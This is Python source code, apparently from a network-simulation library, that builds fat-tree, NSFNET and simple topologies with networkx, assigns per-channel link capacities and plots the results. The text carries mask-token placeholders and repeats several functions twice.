ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
n (int): Number of server per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
aggregate_label (str,int): Label to assign to edge switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
server_to_edge_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
assume do not have rack system where have multiple servers in one
rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
<mask token>
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
network (networkx graph): Network containing edges to whiich attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
or network[0][1]['1_to_0_port']['channels']['channel_1] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
def init_network_node_positions(net):
"""Initialises network node positions for plotting."""
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
font_size (int,float): Size of of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
matplotlib.figure.Figure: node distribution plotted as a 2d matrix.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
<mask token>
| <mask token>
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
indexing purposes when using Demand class. This is useful where want to
use the demand class but not necessarily with a carefully crafted networkx
graph that accurately mimics the network you will use for the demands
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
rack ids, values are list of end points. If None, assume there is not
clustering/rack system in the network where have different end points
in different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
n (int): Number of server per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
aggregate_label (str,int): Label to assign to edge switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
server_to_edge_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
assume do not have rack system where have multiple servers in one
rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
def gen_channel_names(num_channels):
"""Generates channel names for channels on each link in network."""
channels = [(channel + 1) for channel in range(num_channels)]
channel_names = [('channel_' + str(channel)) for channel in channels]
return channel_names
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
network (networkx graph): Network containing edges to whiich attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
or network[0][1]['1_to_0_port']['channels']['channel_1] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
def init_network_node_positions(net):
"""Initialises network node positions for plotting."""
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
